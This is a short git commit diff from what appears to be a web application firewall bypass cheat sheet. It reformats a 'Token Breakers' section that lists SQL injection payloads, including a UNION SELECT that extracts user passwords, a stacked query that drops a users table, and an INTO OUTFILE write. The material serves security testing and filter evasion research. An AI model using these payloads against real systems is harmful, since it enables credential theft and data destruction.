Added stuff follow up update

This commit is contained in:
0xInfection 2019-06-21 21:07:30 +05:30
parent b4afef22b6
commit 179eda145d

View File

@ -2475,12 +2475,12 @@ __13. Token Breakers__
- Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
- However, the request must still remain valid while using token-breakers.
__Case__: Unknown Token for the Tokenizer
__Payload__: `?id=-sqlite_version() UNION SELECT password FROM users --`
- __Case__: Unknown Token for the Tokenizer
- __Payload__: `?id=-sqlite_version() UNION SELECT password FROM users --`
__Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
__Payload 1__: `?id=123);DROP TABLE users --`
__Payload 2__: `?id=1337) INTO OUTFILE xxx --`
- __Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
- __Payload 1__: `?id=123);DROP TABLE users --`
- __Payload 2__: `?id=1337) INTO OUTFILE xxx --`
> __TIP:__ More payloads can be crafted via this [cheat sheet](https://github.com/attackercan/cpp-sql-fuzzer).